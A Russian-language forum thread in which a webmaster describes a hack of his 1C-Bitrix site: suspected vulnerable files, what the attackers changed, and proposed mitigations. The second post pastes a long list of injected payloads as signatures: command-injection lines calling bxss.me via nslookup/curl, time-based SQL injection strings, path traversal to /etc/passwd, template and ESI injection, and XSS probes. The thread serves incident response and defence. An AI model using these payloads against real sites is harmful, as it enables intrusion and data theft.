• Друзья! Этот ресурс создан в далеком 2019 году ;) для себя, чтобы структурировать и всегда иметь под рукой нужные решения, примеры, ссылки, описания и т.д., а при случае все это обсудить с коллегами. Если вам что-то подобное может быть интересно – присоединяйтесь! Добавляйте свои заметки! Если нужны дополнительные разделы – сообщайте!

Взломали сайт на Bitrix (putin_, /vote/uf.php, html_editor_action.php, bxss.me и т.д.)

A

AndreyG

Активист
Сегодня нам взломали сайт на Bitrix. "1С-Битрикс: Управление сайтом 18.1.5". Лицензионный. Скачанный с официального сайта.
Ну и как теперь понятно, взломали не только нам но и всем много кому еще.
Враги изменили содержание index.php в корне. Входов через ssh/ftp не было, т.е. видимо сломали через движок. Как всегда, вероятно через $USER->Authorize(1);
Пока удалось выяснить, что злоумышленники возможно используют уязвимости в файлах:
1. /bitrix/tools/vote/uf.php - у нас такого модуля нет, об этой уязвимости было ранее известно: https://bdu.fstec.ru/vul/2022-01141
2. /bitrix/tools/html_editor_action.php (который вызывает /bitrix/modules/fileman/admin/fileman_html_editor_action.php - файл визуального редактора) - у нас этот файл конечно есть, мы не стали его регулировать правами (а смысл, если это было Authorize(1)?), пока убрали файл совсем, наблюдаем.
Что делают: через уязвимость заливают вредоносный файл в bitrix/upload/tmp и запускают
и далее:
- добавляются агенты (в /bitrix/admin/agent_list.php);
- создается в /bitrix/tools/ файл с префиксом putin_
- удаляется .settings.php;
- пишется новый index.php;
- меняются пароли пользователей (на пароль "putin");
- очищаются таблицы b_iblock, b_iblock_element, b_iblock_element_property


Пока мысль в лоб:
1. сменить id админа;
2. запретить выполнение скриптов из папки bitrix/upload/

Мало ли там еще дыр...

Если вам что-то про это известно, а главное если есть мысли как это предотвратить в будущем - пишите. Решение обновиться до последней версии - не предлагать, во-первых, это не так просто на из-за достаточно "тонкой настройки" сайта, а во-вторых это нужно лицензию продлевать. Но если Битрикс выпустит свободный патч (а по-моему именно так делают в случае критических уязвимостей) - дайте знать.
 
Последнее редактирование:
A

AndreyG

Активист
Опять взломали наш сайт на Битриксе.

Обнаружил множество добавленных почтовых шаблонов содержащих много чего, в том числе ссылки на bxss.me
Шаблоны добавлены в период 05.06.2024 - 06.06.2024
Т.е. доступ злоумышленников к админке, несмотря на все примененные рекомендации по защите, по прежнему возможен. Уязвимость присутствует. Позже проверю как заходили и что еще изменили.

Сигнатуры:
Код: 
".gethostbyname(lc("hitqg"."qiesppyy109f4.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(111).chr(73).chr(107).chr(88)."
(nslookup -q=cname hitypcbjcstsm970aa.bxss.me||curl hitypcbjcstsm970aa.bxss.me))
!(()&&!|*|*|
$(nslookup -q=cname hitatzkkchjnc8ac4b.bxss.me||curl hitatzkkchjnc8ac4b.bxss.me)
$(nslookup -q=cname hitbetenblandc51ae.bxss.me||curl hitbetenblandc51ae.bxss.me)
$(nslookup -q=cname hitcawunnpylk65cd1.bxss.me||curl hitcawunnpylk65cd1.bxss.me)
$(nslookup -q=cname hitdlcxhhqmsuc9156.bxss.me||curl hitdlcxhhqmsuc9156.bxss.me)
$(nslookup -q=cname hitdxhzmhgotm003d1.bxss.me||curl hitdxhzmhgotm003d1.bxss.me)
$(nslookup -q=cname hitetidmwytwy05dfd.bxss.me||curl hitetidmwytwy05dfd.bxss.me)
$(nslookup -q=cname hithoiivgbalr7bb3b.bxss.me||curl hithoiivgbalr7bb3b.bxss.me)
$(nslookup -q=cname hitjtpwkiximk9f191.bxss.me||curl hitjtpwkiximk9f191.bxss.me)
$(nslookup -q=cname hitkfmcfxhmcr3526d.bxss.me||curl hitkfmcfxhmcr3526d.bxss.me)
$(nslookup -q=cname hitklczyiurqocf24b.bxss.me||curl hitklczyiurqocf24b.bxss.me)
$(nslookup -q=cname hitlqpdczmmksd081a.bxss.me||curl hitlqpdczmmksd081a.bxss.me)
$(nslookup -q=cname hitniiiukvbpm892fa.bxss.me||curl hitniiiukvbpm892fa.bxss.me)
$(nslookup -q=cname hitpxwzidzhnj3fbcf.bxss.me||curl hitpxwzidzhnj3fbcf.bxss.me)
$(nslookup -q=cname hitqflvkfabnt38ae6.bxss.me||curl hitqflvkfabnt38ae6.bxss.me)
$(nslookup -q=cname hitqmnvgkggzbac2e9.bxss.me||curl hitqmnvgkggzbac2e9.bxss.me)
$(nslookup -q=cname hitrpefqcjzbl85423.bxss.me||curl hitrpefqcjzbl85423.bxss.me)
$(nslookup -q=cname hitwolhcncogd36284.bxss.me||curl hitwolhcncogd36284.bxss.me)
${@print(md5(31337))}
${10000001+9999571}
${10000053+9999811}
${10000059+10000044}
${10000119+9999388}
${10000170+10000032}
${10000258+9999045}
${10000369+10000484}
${10000456+10000198}
${10000491+9999978}
${9999318+9999087}
${9999333+10000044}
${9999338+10000465}
${9999351+10000107}
${9999470+9999200}
${9999511+9999878}
${9999581+9999008}
${9999663+10000006}
${9999881+9999309}
<!--
".gethostbyname(lc("hitaa"."qdwbsnol585b7.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(112).chr(81).chr(98).chr(75)."
".gethostbyname(lc("hitaj"."muvkksjye5768.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(117).chr(76).chr(105).chr(78)."
".gethostbyname(lc("hitap"."njzgfmxi3240f.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(104).chr(69).chr(120).chr(65)."
".gethostbyname(lc("hitar"."qwhafkzc1cf50.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(109).chr(77).chr(103).chr(82)."
".gethostbyname(lc("hitfb"."eqrudapg641de.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(98).chr(78).chr(111).chr(68)."
".gethostbyname(lc("hitfh"."rcbeauiu79b91.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(121).chr(89).chr(107).chr(66)."
".gethostbyname(lc("hitgm"."avihoqrf86b3c.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(115).chr(68).chr(102).chr(77)."
".gethostbyname(lc("hitit"."ccoimokr843ce.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(105).chr(77).chr(99).chr(86)."
".gethostbyname(lc("hitlg"."aikdqnhp4c160.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(103).chr(69).chr(100).chr(80)."
".gethostbyname(lc("hitlt"."lzfpydwjce740.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(110).chr(82).chr(100).chr(90)."
".gethostbyname(lc("hitov"."nodbxedt8edf2.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(97).chr(79).chr(98).chr(89)."
".gethostbyname(lc("hitqp"."ydfdtoiib6302.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(107).chr(80).chr(99).chr(82)."
".gethostbyname(lc("hitri"."scagoecf17281.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(97).chr(87).chr(101).chr(80)."
".gethostbyname(lc("hituo"."aqcghhcbd7b69.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(115).chr(84).chr(106).chr(65)."
".gethostbyname(lc("hitvx"."hhovmsmj93eeb.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(113).chr(86).chr(115).chr(71)."
".gethostbyname(lc("hitwp"."buvxwmxrf71bd.bxss.me.&quot)."A".chr(67).chr(hex("58&quot).chr(113).chr(79).chr(111).chr(68)."
";print(md5(31337));$a="
"+response.write(9020580*9969555)+"
"+response.write(9040202*9268440)+"
"+response.write(9072363*9056312)+"
"+response.write(9189770*9972958)+"
"+response.write(9195929*9243411)+"
"+response.write(9273098*9276726)+"
"+response.write(9384769*9439021)+"
"+response.write(9446562*9443502)+"
"+response.write(9488999*9167860)+"
"+response.write(9490406*9217469)+"
"+response.write(9499097*9847975)+"
"+response.write(9585022*9900725)+"
"+response.write(9726507*9999634)+"
"+response.write(9776282*9051390)+"
"+response.write(9781513*9807901)+"
"+response.write(9846150*9472173)+"
"+response.write(9880393*9620430)+"
(nslookup -q=cname hitdcgopmjrov512d6.bxss.me||curl hitdcgopmjrov512d6.bxss.me))
(nslookup -q=cname hiteempoayfeq89736.bxss.me||curl hiteempoayfeq89736.bxss.me))
(nslookup -q=cname hitgzkitvgoecfec51.bxss.me||curl hitgzkitvgoecfec51.bxss.me))
(nslookup -q=cname hitijxvszlhxe6a9f3.bxss.me||curl hitijxvszlhxe6a9f3.bxss.me))
(nslookup -q=cname hitkixrldogprc95b1.bxss.me||curl hitkixrldogprc95b1.bxss.me))
(nslookup -q=cname hitkojsymyzbhb8a47.bxss.me||curl hitkojsymyzbhb8a47.bxss.me))
(nslookup -q=cname hitnxqprimphx48fa6.bxss.me||curl hitnxqprimphx48fa6.bxss.me))
(nslookup -q=cname hitpchlkrcglgea259.bxss.me||curl hitpchlkrcglgea259.bxss.me))
(nslookup -q=cname hitrkvszhjtyy4d9d7.bxss.me||curl hitrkvszhjtyy4d9d7.bxss.me))
(nslookup -q=cname hittbrsfdbynx4473d.bxss.me||curl hittbrsfdbynx4473d.bxss.me))
(nslookup -q=cname hitubyjamgqus959b2.bxss.me||curl hitubyjamgqus959b2.bxss.me))
(nslookup -q=cname hitutxzmanmgn91f97.bxss.me||curl hitutxzmanmgn91f97.bxss.me))
(nslookup -q=cname hitvgfqbdragvbafdc.bxss.me||curl hitvgfqbdragvbafdc.bxss.me))
(nslookup -q=cname hitxlydyomwtbf4b3d.bxss.me||curl hitxlydyomwtbf4b3d.bxss.me))
(nslookup -q=cname hityrauwbqdrl992fa.bxss.me||curl hityrauwbqdrl992fa.bxss.me))
(nslookup -q=cname hitzdblclshhh4ab51.bxss.me||curl hitzdblclshhh4ab51.bxss.me))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../160
../24
../31
./160
./24
./31
/etc/shells
@@0gRfO
@@4XEjG
@@5Xo75
@@6RJu3
@@7TAm4
@@ARYId
@@i3VKP
@@i7PZy
@@jV35e
@@LDLT9
@@LRKPP
@@M7bNN
@@NP4sn
@@Nz0Ff
@@uNJhK
@@vsBG7
@@XBU2f
@@zT22t
^(#$!@#$)(()))******
`(nslookup -q=cname hitalhdbtwxpd49cc9.bxss.me||curl hitalhdbtwxpd49cc9.bxss.me)`
`(nslookup -q=cname hitapoqdflwhof26e2.bxss.me||curl hitapoqdflwhof26e2.bxss.me)`
`(nslookup -q=cname hitcehptnoart54461.bxss.me||curl hitcehptnoart54461.bxss.me)`
`(nslookup -q=cname hitcgtoyzhaalf4b96.bxss.me||curl hitcgtoyzhaalf4b96.bxss.me)`
`(nslookup -q=cname hitefreikcrxh6e2ed.bxss.me||curl hitefreikcrxh6e2ed.bxss.me)`
`(nslookup -q=cname hithwqbfrmvim73bae.bxss.me||curl hithwqbfrmvim73bae.bxss.me)`
`(nslookup -q=cname hitinanklgumya26de.bxss.me||curl hitinanklgumya26de.bxss.me)`
`(nslookup -q=cname hitloeizvypwn96dbb.bxss.me||curl hitloeizvypwn96dbb.bxss.me)`
`(nslookup -q=cname hitltmvxvnfeda03b1.bxss.me||curl hitltmvxvnfeda03b1.bxss.me)`
`(nslookup -q=cname hitlvalkhonzc3502b.bxss.me||curl hitlvalkhonzc3502b.bxss.me)`
`(nslookup -q=cname hitoxmnsnawcx373eb.bxss.me||curl hitoxmnsnawcx373eb.bxss.me)`
`(nslookup -q=cname hitrpkkvzlxll65ba1.bxss.me||curl hitrpkkvzlxll65ba1.bxss.me)`
`(nslookup -q=cname hitsuerhcxxpb3039f.bxss.me||curl hitsuerhcxxpb3039f.bxss.me)`
`(nslookup -q=cname hituvvqvlyfcgcc0e1.bxss.me||curl hituvvqvlyfcgcc0e1.bxss.me)`
`(nslookup -q=cname hitvekjqokvho59331.bxss.me||curl hitvekjqokvho59331.bxss.me)`
`(nslookup -q=cname hitwykpmicdwdf33cb.bxss.me||curl hitwykpmicdwdf33cb.bxss.me)`
`(nslookup -q=cname hitxpwqhbobmu6ba85.bxss.me||curl hitxpwqhbobmu6ba85.bxss.me)`
{{11381*11381}}
{{20240*20240}}
{{23313*23313}}
{{27650*27650}}
{{34734*34734}}
{{36705*36705}}
{{39876*39876}}
{{46458*46458}}
{{48211*48211}}
{{50836*50836}}
|(nslookup -q=cname hitevswzdxqmp39e95.bxss.me||curl hitevswzdxqmp39e95.bxss.me)
|(nslookup -q=cname hitfmnqxomaso2c3cb.bxss.me||curl hitfmnqxomaso2c3cb.bxss.me)
|(nslookup -q=cname hitkfsponrahlbc9a8.bxss.me||curl hitkfsponrahlbc9a8.bxss.me)
|(nslookup -q=cname hitleidviywtre5863.bxss.me||curl hitleidviywtre5863.bxss.me)
|(nslookup -q=cname hitlqtlwohbmjeed74.bxss.me||curl hitlqtlwohbmjeed74.bxss.me)
|(nslookup -q=cname hitlrhvxuzxvx3afeb.bxss.me||curl hitlrhvxuzxvx3afeb.bxss.me)
|(nslookup -q=cname hitmsqdvvfrdm52bd3.bxss.me||curl hitmsqdvvfrdm52bd3.bxss.me)
|(nslookup -q=cname hitpfhvnaplfy9ff91.bxss.me||curl hitpfhvnaplfy9ff91.bxss.me)
|(nslookup -q=cname hitphyyhnsajk67a50.bxss.me||curl hitphyyhnsajk67a50.bxss.me)
|(nslookup -q=cname hitsqycuyuemn359cb.bxss.me||curl hitsqycuyuemn359cb.bxss.me)
|(nslookup -q=cname hitvetqhhlwqqaffb9.bxss.me||curl hitvetqhhlwqqaffb9.bxss.me)
|(nslookup -q=cname hitwupqjcjmfxd06a3.bxss.me||curl hitwupqjcjmfxd06a3.bxss.me)
|(nslookup -q=cname hitwwqwisuwpzb012d.bxss.me||curl hitwwqwisuwpzb012d.bxss.me)
|(nslookup -q=cname hitxclhhqcxncecd3a.bxss.me||curl hitxclhhqcxncecd3a.bxss.me)
|(nslookup -q=cname hitxpjcvkcpor5466c.bxss.me||curl hitxpjcvkcpor5466c.bxss.me)
|(nslookup -q=cname hitydzasimvye41434.bxss.me||curl hitydzasimvye41434.bxss.me)
|(nslookup -q=cname hitzzvkungueh6f961.bxss.me||curl hitzzvkungueh6f961.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitduldslrayb95143.bxss.me||curl${IFS}hitduldslrayb95143.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitedjyylljhbf0d9c.bxss.me||curl${IFS}hitedjyylljhbf0d9c.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitfzuoqxebnud3855.bxss.me||curl${IFS}hitfzuoqxebnud3855.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hithhiqeabrrv51ae5.bxss.me||curl${IFS}hithhiqeabrrv51ae5.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hititkkllzahl139b8.bxss.me||curl${IFS}hititkkllzahl139b8.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitivajrbqmeu91955.bxss.me||curl${IFS}hitivajrbqmeu91955.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitkfcgnqhhooc4bc6.bxss.me||curl${IFS}hitkfcgnqhhooc4bc6.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitkzvssvkzujc9243.bxss.me||curl${IFS}hitkzvssvkzujc9243.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitlxmtkglpkw3125b.bxss.me||curl${IFS}hitlxmtkglpkw3125b.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitnmucnvfrggd1510.bxss.me||curl${IFS}hitnmucnvfrggd1510.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitnufuznpasp8df8b.bxss.me||curl${IFS}hitnufuznpasp8df8b.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitrlyqctlzcf8664a.bxss.me||curl${IFS}hitrlyqctlzcf8664a.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitrudvenbwkn4845b.bxss.me||curl${IFS}hitrudvenbwkn4845b.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitsbzqyqgtjidc818.bxss.me||curl${IFS}hitsbzqyqgtjidc818.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitueplwnqucpe5806.bxss.me||curl${IFS}hitueplwnqucpe5806.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hituhjhhbtkjqede24.bxss.me||curl${IFS}hituhjhhbtkjqede24.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hityjvlpcpkwz66b8d.bxss.me||curl${IFS}hityjvlpcpkwz66b8d.bxss.me)
-1 OR 2+15-15-1=0+0+0+1
-1 OR 2+212-212-1=0+0+0+1
-1 OR 2+23-23-1=0+0+0+1
-1 OR 2+311-311-1=0+0+0+1
-1 OR 2+336-336-1=0+0+0+1
-1 OR 2+396-396-1=0+0+0+1
-1 OR 2+427-427-1=0+0+0+1
-1 OR 2+500-500-1=0+0+0+1
-1 OR 2+506-506-1=0+0+0+1
-1 OR 2+588-588-1=0+0+0+1
-1 OR 2+610-610-1=0+0+0+1
-1 OR 2+661-661-1=0+0+0+1
-1 OR 2+667-667-1=0+0+0+1
-1 OR 2+671-671-1=0+0+0+1
-1 OR 2+695-695-1=0+0+0+1
-1 OR 2+770-770-1=0+0+0+1
-1 OR 2+785-785-1=0+0+0+1
-1 OR 2+97-97-1=0+0+0+1
-1 OR 3+15-15-1=0+0+0+1
-1 OR 3+212-212-1=0+0+0+1
-1 OR 3+23-23-1=0+0+0+1
-1 OR 3+311-311-1=0+0+0+1
-1 OR 3+336-336-1=0+0+0+1
-1 OR 3+396-396-1=0+0+0+1
-1 OR 3+427-427-1=0+0+0+1
-1 OR 3+500-500-1=0+0+0+1
-1 OR 3+506-506-1=0+0+0+1
-1 OR 3+588-588-1=0+0+0+1
-1 OR 3+610-610-1=0+0+0+1
-1 OR 3+661-661-1=0+0+0+1
-1 OR 3+667-667-1=0+0+0+1
-1 OR 3+671-671-1=0+0+0+1
-1 OR 3+695-695-1=0+0+0+1
-1 OR 3+770-770-1=0+0+0+1
-1 OR 3+785-785-1=0+0+0+1
-1 OR 3+97-97-1=0+0+0+1
160<esi:include src="http://bxss.me/rpb.png"/>
160&n910884=v939480
160&n960621=v952525
160"&&sleep(27*1000)*bzjkix&&"
160"&&sleep(27*1000)*ztaige&&"
160"||sleep(27*1000)*jjhpte||"
160"||sleep(27*1000)*xtowca||"
160*1
160*118*113*0
160*282*277*0
160*732*727*0
160*880*875*0
160*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
160*if(now()=sysdate(),sleep(15),0)
1600"XOR(160*if(now()=sysdate(),sleep(15),0))XOR"Z
160-1 OR 483=(SELECT 483 FROM PG_SLEEP(15))--
160-1 OR 812=(SELECT 812 FROM PG_SLEEP(15))--
160-1) OR 905=(SELECT 905 FROM PG_SLEEP(15))--
160-1) OR 92=(SELECT 92 FROM PG_SLEEP(15))--
160-1)) OR 266=(SELECT 266 FROM PG_SLEEP(15))--
160-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
1608HUdq5Uz
160TJU0zfn9
1GkeX5ntO
1NdgEp5eO
24<esi:include src="http://bxss.me/rpb.png"/>
24&n903192=v988991
24&n912163=v956552
24&n915975=v916783
24&n935192=v984244
24&n971702=v918486
24&n981035=v932766
24&n993334=v980107
24&n995360=v929780
24&n997274=v974710
24"&&sleep(27*1000)*cyamuk&&"
24"&&sleep(27*1000)*dikmby&&"
24"&&sleep(27*1000)*epsskb&&"
24"&&sleep(27*1000)*frgdfo&&"
24"&&sleep(27*1000)*ijzsgs&&"
24"&&sleep(27*1000)*ilnxsd&&"
24"&&sleep(27*1000)*ngkywj&&"
24"&&sleep(27*1000)*niajcy&&"
24"&&sleep(27*1000)*yynlid&&"
24"||sleep(27*1000)*iezsbn||"
24"||sleep(27*1000)*iwalpg||"
24"||sleep(27*1000)*kgvxgx||"
24"||sleep(27*1000)*kwinjb||"
24"||sleep(27*1000)*lmazgj||"
24"||sleep(27*1000)*mqfzbd||"
24"||sleep(27*1000)*pmkxdk||"
24"||sleep(27*1000)*thupws||"
24"||sleep(27*1000)*tttgwc||"
24*1
24*24*19*0
24*253*248*0
24*271*266*0
24*377*372*0
24*398*393*0
24*538*533*0
24*579*574*0
24*678*673*0
24*703*698*0
24*885*880*0
24*930*925*0
24*989*984*0
24*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
24*if(now()=sysdate(),sleep(15),0)
240"XOR(24*if(now()=sysdate(),sleep(15),0))XOR"Z
24-1 OR 213=(SELECT 213 FROM PG_SLEEP(15))--
24-1 OR 265=(SELECT 265 FROM PG_SLEEP(15))--
24-1 OR 321=(SELECT 321 FROM PG_SLEEP(15))--
24-1 OR 374=(SELECT 374 FROM PG_SLEEP(15))--
24-1 OR 409=(SELECT 409 FROM PG_SLEEP(15))--
24-1 OR 511=(SELECT 511 FROM PG_SLEEP(15))--
24-1 OR 548=(SELECT 548 FROM PG_SLEEP(15))--
24-1 OR 620=(SELECT 620 FROM PG_SLEEP(15))--
24-1 OR 804=(SELECT 804 FROM PG_SLEEP(15))--
24-1 OR 945=(SELECT 945 FROM PG_SLEEP(15))--
24-1) OR 100=(SELECT 100 FROM PG_SLEEP(15))--
24-1) OR 118=(SELECT 118 FROM PG_SLEEP(15))--
24-1) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
24-1) OR 45=(SELECT 45 FROM PG_SLEEP(15))--
24-1) OR 600=(SELECT 600 FROM PG_SLEEP(15))--
24-1) OR 691=(SELECT 691 FROM PG_SLEEP(15))--
24-1) OR 731=(SELECT 731 FROM PG_SLEEP(15))--
24-1) OR 848=(SELECT 848 FROM PG_SLEEP(15))--
24-1) OR 88=(SELECT 88 FROM PG_SLEEP(15))--
24-1) OR 940=(SELECT 940 FROM PG_SLEEP(15))--
24-1)) OR 111=(SELECT 111 FROM PG_SLEEP(15))--
24-1)) OR 153=(SELECT 153 FROM PG_SLEEP(15))--
24-1)) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
24-1)) OR 212=(SELECT 212 FROM PG_SLEEP(15))--
24-1)) OR 448=(SELECT 448 FROM PG_SLEEP(15))--
24-1)) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
24-1)) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
24-1)) OR 708=(SELECT 708 FROM PG_SLEEP(15))--
24-1)) OR 771=(SELECT 771 FROM PG_SLEEP(15))--
24-1)) OR 906=(SELECT 906 FROM PG_SLEEP(15))--
241nPrJM7x
2421VTZjqz
247TJUEcAZ
249274691
24BuMfKwsp
24JZaYvJTe
24l0bT4Tpy
24lj8I9YxW
24tSMTGRGi
24U85sb7ZZ
24xCiSvsqs
31<esi:include src="http://bxss.me/rpb.png"/>
31&n912326=v915422
31&n921905=v919782
31&n959758=v984724
31&n965602=v913459
31&n990245=v965237
31"&&sleep(27*1000)*lqlndc&&"
31"&&sleep(27*1000)*otgcfc&&"
31"&&sleep(27*1000)*pxatoz&&"
31"&&sleep(27*1000)*wakhzj&&"
31"&&sleep(27*1000)*zihlys&&"
31"||sleep(27*1000)*aevejx||"
31"||sleep(27*1000)*jotgvp||"
31"||sleep(27*1000)*kkxmdc||"
31"||sleep(27*1000)*rklgfa||"
31"||sleep(27*1000)*tpxobz||"
31*1
31*319*314*0
31*456*451*0
31*818*813*0
31*852*847*0
31*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
31*if(now()=sysdate(),sleep(15),0)
310"XOR(31*if(now()=sysdate(),sleep(15),0))XOR"Z
31-1 OR 188=(SELECT 188 FROM PG_SLEEP(15))--
31-1 OR 230=(SELECT 230 FROM PG_SLEEP(15))--
31-1 OR 310=(SELECT 310 FROM PG_SLEEP(15))--
31-1 OR 380=(SELECT 380 FROM PG_SLEEP(15))--
31-1 OR 718=(SELECT 718 FROM PG_SLEEP(15))--
31-1 OR 963=(SELECT 963 FROM PG_SLEEP(15))--
31-1) OR 166=(SELECT 166 FROM PG_SLEEP(15))--
31-1) OR 248=(SELECT 248 FROM PG_SLEEP(15))--
31-1) OR 379=(SELECT 379 FROM PG_SLEEP(15))--
31-1) OR 558=(SELECT 558 FROM PG_SLEEP(15))--
31-1) OR 761=(SELECT 761 FROM PG_SLEEP(15))--
31-1) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
31-1)) OR 256=(SELECT 256 FROM PG_SLEEP(15))--
31-1)) OR 449=(SELECT 449 FROM PG_SLEEP(15))--
31-1)) OR 483=(SELECT 483 FROM PG_SLEEP(15))--
31-1)) OR 799=(SELECT 799 FROM PG_SLEEP(15))--
31-1)) OR 857=(SELECT 857 FROM PG_SLEEP(15))--
31-1)) OR 938=(SELECT 938 FROM PG_SLEEP(15))--
316xY42hjG
31AJZHxOD1
31BoBVYtHY
31ipZHdZOi
31KOcOIiOc
31nTrTHPFN
Array
bxss.me/t/xss.html?%00
bxss.me
c:/windows/win.ini
file:///etc/passwd
form.php/.
form.php
[URL unfurl="true"]http://bxss.me/t/fit.txt?.jpg[/URL]
[URL unfurl="true"]Http://bxss.me/t/fit.txt[/URL]
[URL unfurl="true"]HttP://bxss.me/t/xss.html?%00[/URL]
[URL unfurl="true"]http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg[/URL]
JJJ0QQQ
OzJorH4T
response.write(9020580*9969555)
response.write(9040202*9268440)
response.write(9072363*9056312)
response.write(9189770*9972958)
response.write(9195929*9243411)
response.write(9273098*9276726)
response.write(9384769*9439021)
response.write(9446562*9443502)
response.write(9488999*9167860)
response.write(9490406*9217469)
response.write(9499097*9847975)
response.write(9585022*9900725)
response.write(9726507*9999634)
response.write(9776282*9051390)
response.write(9781513*9807901)
response.write(9846150*9472173)
response.write(9880393*9620430)
undefined
xfs.bxss.me
-1 OR 2+10-10-1=0+0+0+1 --
-1 OR 2+224-224-1=0+0+0+1 --
-1 OR 2+246-246-1=0+0+0+1 --
-1 OR 2+301-301-1=0+0+0+1 --
-1 OR 2+322-322-1=0+0+0+1 --
-1 OR 2+448-448-1=0+0+0+1 --
-1 OR 2+478-478-1=0+0+0+1 --
-1 OR 2+480-480-1=0+0+0+1 --
-1 OR 2+64-64-1=0+0+0+1 --
-1 OR 2+834-834-1=0+0+0+1 --
-1 OR 2+888-888-1=0+0+0+1 --
-1 OR 2+90-90-1=0+0+0+1 --
-1 OR 2+940-940-1=0+0+0+1 --
-1 OR 3+10-10-1=0+0+0+1 --
-1 OR 3+224-224-1=0+0+0+1 --
-1 OR 3+246-246-1=0+0+0+1 --
-1 OR 3+301-301-1=0+0+0+1 --
-1 OR 3+322-322-1=0+0+0+1 --
-1 OR 3+448-448-1=0+0+0+1 --
-1 OR 3+478-478-1=0+0+0+1 --
-1 OR 3+480-480-1=0+0+0+1 --
-1 OR 3+64-64-1=0+0+0+1 --
-1 OR 3+834-834-1=0+0+0+1 --
-1 OR 3+888-888-1=0+0+0+1 --
-1 OR 3+90-90-1=0+0+0+1 --
-1 OR 3+940-940-1=0+0+0+1 --
1 PROCEDURE ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
-1" OR 2+193-193-1=0+0+0+1 --
-1" OR 2+20-20-1=0+0+0+1 --
-1" OR 2+23-23-1=0+0+0+1 --
-1" OR 2+234-234-1=0+0+0+1 --
-1" OR 2+266-266-1=0+0+0+1 --
-1" OR 2+51-51-1=0+0+0+1 --
-1" OR 2+538-538-1=0+0+0+1 --
-1" OR 2+703-703-1=0+0+0+1 --
-1" OR 2+741-741-1=0+0+0+1 --
-1" OR 2+800-800-1=0+0+0+1 --
-1" OR 2+801-801-1=0+0+0+1 --
-1" OR 2+934-934-1=0+0+0+1 --
-1" OR 2+965-965-1=0+0+0+1 --
-1" OR 3+193-193-1=0+0+0+1 --
-1" OR 3+20-20-1=0+0+0+1 --
-1" OR 3+23-23-1=0+0+0+1 --
-1" OR 3+234-234-1=0+0+0+1 --
-1" OR 3+266-266-1=0+0+0+1 --
-1" OR 3+51-51-1=0+0+0+1 --
-1" OR 3+538-538-1=0+0+0+1 --
-1" OR 3+703-703-1=0+0+0+1 --
-1" OR 3+741-741-1=0+0+0+1 --
-1" OR 3+800-800-1=0+0+0+1 --
-1" OR 3+801-801-1=0+0+0+1 --
-1" OR 3+934-934-1=0+0+0+1 --
-1" OR 3+965-965-1=0+0+0+1 --
31&n978344=v959374
31"&&sleep(27*1000)*mylmtg&&"
31"||sleep(27*1000)*btmwly||"
 
Последнее редактирование:
Сверху